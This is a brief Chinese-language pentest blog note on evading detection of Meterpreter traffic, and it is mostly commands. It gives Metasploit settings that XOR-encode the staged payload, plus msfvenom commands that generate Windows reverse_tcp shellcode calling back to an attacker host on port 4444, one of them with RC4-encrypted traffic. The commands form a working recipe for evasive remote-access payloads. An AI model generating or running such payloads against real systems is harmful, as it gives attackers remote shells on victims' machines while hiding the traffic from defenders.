Meterpreter 流量免杀

X1r0z included in Pentest
  About 100 words One minute 

对 meterpreter 流量进行编码或加密, 有两种方式.

指定编码方式, 名称与对 shellcode 的编码器相同.

1
2
3

set EnableStageEncoding true
set StageEncoder x86/xor_dynamic
set StageEncodingFallback false

生成 shellcode.

1

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 EnableStageEncoding=true StageEncoder=x86/xor_dynamic StageEncodingFallback=false -f c -o shellcode.c

或是直接生成通过 rc4 加密流量的 shellcode.

1

msfvenom -p windows/meterpreter/reverse_tcp_rc4 LHOST=192.168.1.1 LPORT=4444 RC4PASSWORD=exp10it -f c -o shellcode.c
Updated on 2019-08-04 
CC BY-NC-SA 4.0
Read Markdown
MetasploitBypass
Back | Home
0%